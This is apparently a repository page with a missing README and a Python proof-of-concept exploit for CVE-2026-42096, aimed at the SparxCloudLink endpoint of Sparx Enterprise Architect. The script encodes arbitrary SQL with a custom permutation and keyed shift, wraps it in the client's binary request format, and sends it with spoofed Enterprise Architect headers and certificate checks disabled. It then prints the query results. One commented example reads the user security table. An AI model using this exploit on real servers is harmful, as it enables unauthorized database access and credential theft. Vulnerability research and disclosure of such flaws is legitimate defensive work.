README.md
README.md not found for CVE-2026-42096. The file may not exist in the repository.
import sys
import requests
import urllib3
import pycurl
from io import BytesIO
import zipfile
# Placeholder only: the real key string is not included in this listing.
k = "HERE_SHOULD_BE_THE_KEY"
# Fixed permutation of the seven positions inside each 7-character group;
# demangle() reads its source offsets from this table.
x = [4, 2, 0, 6, 3, 1, 5]
# Inverse table: xr[v] is the position at which v occurs in x.
# mangle() reads its source offsets from this table.
xr = [
    position
    for _, position in sorted(
        (value, position) for position, value in enumerate(x)
    )
]
def mangle(s: str) -> str:
    """Reorder every complete 7-character group of ``s`` using ``xr``.

    Characters after the last complete group are returned unchanged.
    The characters are written by index into the UTF-8 encoding of ``s``,
    so the function only behaves as a character permutation for ASCII
    input; a code point above 255 makes the byte assignment raise
    ``ValueError``.
    """
    buf = bytearray(s, "utf-8")
    # Only whole groups of seven are permuted.
    whole = len(s) - len(s) % 7
    for base in range(0, whole, 7):
        for offset, source in enumerate(xr):
            buf[base + offset] = ord(s[base + source])
    return buf.decode("utf-8")
def demangle(s: str) -> str:
    """Reorder every complete 7-character group of ``s`` using ``x``.

    ``x`` is the inverse table of ``xr``, so this applies the opposite
    reordering to the one in ``mangle``. Characters after the last
    complete group are returned unchanged. As in ``mangle``, the
    characters are written by index into the UTF-8 encoding of ``s``,
    so only ASCII input is handled as a plain character permutation.
    """
    buf = bytearray(s, "utf-8")
    # Only whole groups of seven are permuted.
    whole = len(s) - len(s) % 7
    for base in range(0, whole, 7):
        for offset, source in enumerate(x):
            buf[base + offset] = ord(s[base + source])
    return buf.decode("utf-8")
def custom_decode(ciphertext: str, key: str) -> str:
    """Undo the position-keyed character shift applied by the encoder.

    ciphertext : input string (Unicode)
    key        : key string (Unicode); must be non-empty when
                 ``ciphertext`` is non-empty, otherwise the modulo by
                 its length raises ``ZeroDivisionError``

    Returns the shifted string. At most one correction of 0x5E is
    applied per character, so the result is only guaranteed to land in
    0x20-0x7E for inputs and keys in the range the encoder works with
    (presumably printable ASCII).
    """
    total_len = len(ciphertext)
    modulus = len(key)
    decoded = []
    for pos, symbol in enumerate(ciphertext):
        # The key index is offset by the message length, not just the
        # character position.
        key_code = ord(key[(pos + total_len) % modulus])
        value = ord(symbol) - 0x20 - key_code + 0x40
        if value < 0x20:
            # Wrapped below the printable range: shift up by the
            # alphabet size.
            value += 0x5E
        elif value > 0x5E + 0x20:
            # Overshot the printable range: shift down by the alphabet
            # size.
            value -= 0x5E
        decoded.append(chr(value))
    return "".join(decoded)
def custom_encode(plaintext: str, key: str) -> str:
    """Apply a position-keyed character shift over a 94-symbol alphabet.

    plaintext : input string (Unicode)
    key       : key string (Unicode); must be non-empty when
                ``plaintext`` is non-empty, otherwise the modulo by its
                length raises ``ZeroDivisionError``

    Each output character is ``(ord(ch) - 0x40 + key_code) % 0x5E + 0x20``,
    so the result always lies in 0x20-0x7D. The key index is offset by
    the message length. This is a reversible shift and not an integrity
    or authentication mechanism: anyone holding the key can produce
    valid output.
    """
    span = len(plaintext)
    key_size = len(key)
    return "".join(
        chr(
            (ord(key[(idx + span) % key_size]) + ord(symbol) - 0x40) % 0x5E
            + 0x20
        )
        for idx, symbol in enumerate(plaintext)
    )
def test(debug_type, debug_msg):
    """Print one libcurl debug record.

    Registered below as the pycurl ``DEBUGFUNCTION`` callback, so it is
    called with the record type and its payload while verbose mode is on.
    """
    record = "debug(%d): %s" % (debug_type, debug_msg)
    print(record)
if __name__ == "__main__":
    # Proof-of-concept driver for the issue this page files under
    # CVE-2026-42096. It builds one framed request containing the SQL text
    # given on the command line and prints whatever the server returns.
    # The key constant `k` above is a placeholder in this listing.
    #
    # NOTE(defender): everything that identifies the client below (the
    # EnterpriseArchitect-* headers and the User-Agent) is set by this
    # script, so those values in a request log are not evidence that a
    # genuine Enterprise Architect client sent the request.

    # Exactly three arguments are required: base URL, model name, SQL text.
    if (len(sys.argv)!=4):
        print("Usage: "+sys.argv[0]+" URL_without_sparxcloudlink_path model_name sql")
        exit(-1)
    host = sys.argv[1]
    repo = sys.argv[2]
    sqli = sys.argv[3]
    #url = "%s/SparxCloudLink.sseap?model=%s"%(host,repo)
    # The endpoint path is appended to the caller-supplied base URL; the
    # model name travels inside the request body, not in the query string.
    url = "%s/SparxCloudLink.sseap"%(host)
    print(url)
    # Prefix the statement with its own length and a colon.
    sqli = str(len(sqli))+":"+sqli
    fill="+d1XL|@"
    # Pad with the tail of `fill` so the length becomes a multiple of 7,
    # the group size mangle() permutes. When the length is already a
    # multiple of 7 the whole 7-character filler is appended.
    sqli += fill[-(7-(len(sqli)%7)):]
    print (sqli)
    #sqli="23:Select * from t_secuser|@"
    # Permute the 7-character groups, then apply the keyed shift.
    ret=custom_encode(mangle(sqli),k)
    # Request body layout, in the order it is assembled:
    #   6 fixed bytes
    #   2-byte big-endian value len(ret)*2+66 (presumably a length field;
    #     the meaning of the constant 66 is not visible here, TODO confirm)
    #   2-byte big-endian len(repo), then each repo character followed
    #     by a zero byte
    #   4 fixed bytes
    #   2-byte big-endian len(ret), then each encoded character followed
    #     by a zero byte
    # '%04X' yields more than four hex digits for values above 0xFFFF, so
    # the 2-byte fields silently widen (or fromhex raises) for very long
    # input. bytes([ord(c),0]) raises ValueError for code points above 255.
    binary=bytes([0,0,0,1,0,0])
    binary+=bytes.fromhex('%04X'%(len(ret)*2+66))
    binary+=bytes.fromhex('%04X'%(len(repo)))
    for c in repo:
        binary+=bytes([ord(c),0])
    binary+=bytes([0,1,0,0])
    binary+=bytes.fromhex('%04X'%(len(ret)))
    for c in ret:
        binary+=bytes([ord(c),0])
    # `c` is reused here: it was the loop variable above and is the curl
    # handle from this point on.
    c=pycurl.Curl()
    c.setopt(pycurl.URL, url)
    # The framed body is sent as a raw POST of exactly len(binary) bytes.
    c.setopt(pycurl.READDATA, BytesIO(binary))
    c.setopt(pycurl.POSTFIELDSIZE, len(binary))
    c.setopt(pycurl.POST, 1)
    # Verbose mode routes libcurl's debug records to test() above.
    c.setopt(pycurl.VERBOSE, 1)
    c.setopt(pycurl.DEBUGFUNCTION, test)
    # Content-Type and Accept are given with empty values (presumably to
    # suppress libcurl's defaults, TODO confirm); the remaining headers
    # present the request as Enterprise Architect 15.1 build 1527.
    c.setopt(pycurl.HTTPHEADER, ['Content-Type: ' , 'Accept: ', 'EnterpriseArchitect-Build: 1527' , 'EnterpriseArchitect-InternalBuild: 481' , 'User-Agent: Enterprise Architect/15.1.1527' , 'Connection: Keep-Alive' , 'Cache-Control: no-cache'])
    body = BytesIO()
    c.setopt(pycurl.WRITEDATA, body)
    # Certificate and hostname verification are both switched off, so the
    # identity of the responding server is not checked and the response
    # must be treated as unauthenticated data.
    c.setopt(pycurl.SSL_VERIFYPEER, 0)
    c.setopt(pycurl.SSL_VERIFYHOST, 0)
    # The handle is not closed if perform() raises.
    c.perform()
    c.close()
    # The response is first treated as a ZIP archive holding 'query.xml'.
    # Anything that is not a ZIP is written to stdout unchanged. A ZIP
    # without a 'query.xml' member raises KeyError, which is not caught.
    try:
        z = zipfile.ZipFile(body)
        print(z.read('query.xml').decode('utf-8'))
    except zipfile.BadZipFile:
        sys.stdout.buffer.write(body.getvalue())